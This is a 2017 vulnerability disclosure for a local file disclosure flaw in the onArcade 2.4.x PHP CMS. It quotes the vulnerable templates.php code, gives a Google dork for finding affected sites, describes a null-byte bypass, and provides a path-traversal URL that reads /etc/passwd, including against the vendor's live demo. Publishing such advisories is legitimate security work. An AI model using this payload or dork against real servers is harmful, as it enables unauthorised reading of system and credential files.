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onArcade 2.4.x Local File Disclosure

Posted on 23 March 2017

# Exploit Title: onArcade 2.4.x Local File Get Contents Vulnerability # Google Dork: inurl:"cup.php?a=all" # Date: 23 Mar 2017 # Exploit Author: Deyaa Muhammad # Author Mail: contact [at] deyaa.me # Exploit Blog: http://www.deyaa.me/2017/03/onArcade-2.4.x-Local-File-Get-Contents-Vulnerability.html # POC Video : https://youtu.be/IoQ0Z1OdZF0 # Vendor Homepage: http://www.onarcade.com/ # Demo Link: http://www.onarcade.com/Main/Demo # Version: 2.4.x # Tested on: 4.9.8-1-ARCH [1] Introduction Hello World, onArcade is a nice PHP CMS Software that handle videos and online games content, As you can see [3] there is no enough filtering for template file handling, which leads to file_get_contents() vulnerability. [2] Vulnerable Versions onArcade 2.4.2 onArcade 2.4.1 onArcade 2.4.0 [3] Bug Track Because of the special treatment for .php extension, we wont be able to read the files with php extension But , you may use Null-Byte %00 to bypass this problem and "drop" the extension in file path when PHP <= 5.3.4 File Link : https://gist.github.com/deyaamuhammad/a77021cbed2285e12c59f3c0eed45af5#file-templates-php-L57 File Path : /srv/http/onarcade242/admin/templates.php Line : 57 [code] case 'template_values': $file_name = './templates/'. $_GET['template'] .'/'. $_GET['file']; $file_type = strtolower(substr($_GET['file'], -3)); if ($file_type == '.js') { $file_type = 'js'; } if (!file_exists($file_name) || !($contents = @file_get_contents($file_name))) { $template->json_error($lang['no_page_found']); } // array returned to user $return = array('error' => false, 'type' => $file_type, 'code' => '' ); // process PHP template file if ($file_type == "php") { if (!isset($_GET['function'])) { // get all templates list $return['functions'] = array(); preg_match_all("#{template\s([^}]*)}.+?{/template}#s", $contents, $matches); foreach ($matches[1] AS $match) { $return['functions'][] = $match; } unset($matches); if (!empty($return['functions'])) { $function = trim($return['functions'][0]); } } else { $function = trim($_GET['function']); } if (preg_match("#{template\s+". str_replace(array('(', ')', '$'), array('\(', '\)', '\$'), $function) ."\s*} ?(.+?) ?{/template}#s", $contents, $match) > 0) { $return['code'] = $match[1]; } else { $template->json_error('Template not found.'); } } else { $return['code'] = $contents; } $template->json($return); break; [/code] [4] Conclusion be safe don't upload this to your server. [5] Exploit http://www.target.com/onarcade242/admin/templates.php?a=template_values&file=../../../../../etc/passwd [6] Live Example http://www.onarcade.com/onarcade242/admin/templates.php?a=template_values&file=../../../../../etc/passwd